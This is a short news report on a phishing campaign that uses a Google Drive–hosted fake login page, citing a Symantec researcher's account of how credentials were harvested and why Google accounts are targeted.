There is a complex phishing campaign leveraging Google Drive that would be hard for users to figure out as a scam, researchers said.
Potential victims receive an email with a subject line saying “Documents” with encouragement to click on a link to a purported important document, said Nick Johnston of Symantec in a blog post.
Clicking on the link takes a user to a login page that looks the same as the one used for Google’s many online services.
That fake login page is “actually hosted on Google’s servers and is served over SSL [Secure Sockets Layer], making the page even more convincing,” Johnston said.
“The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there and then used Google Drive’s preview feature to get a publicly-accessible URL to include in their messages,” he said.
If a user takes the bait, their login and password is sent to a PHP script on a compromised Web server, Johnston said. The fake login page subsequently redirects to Google Docs documents.
“Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content,” Johnston said.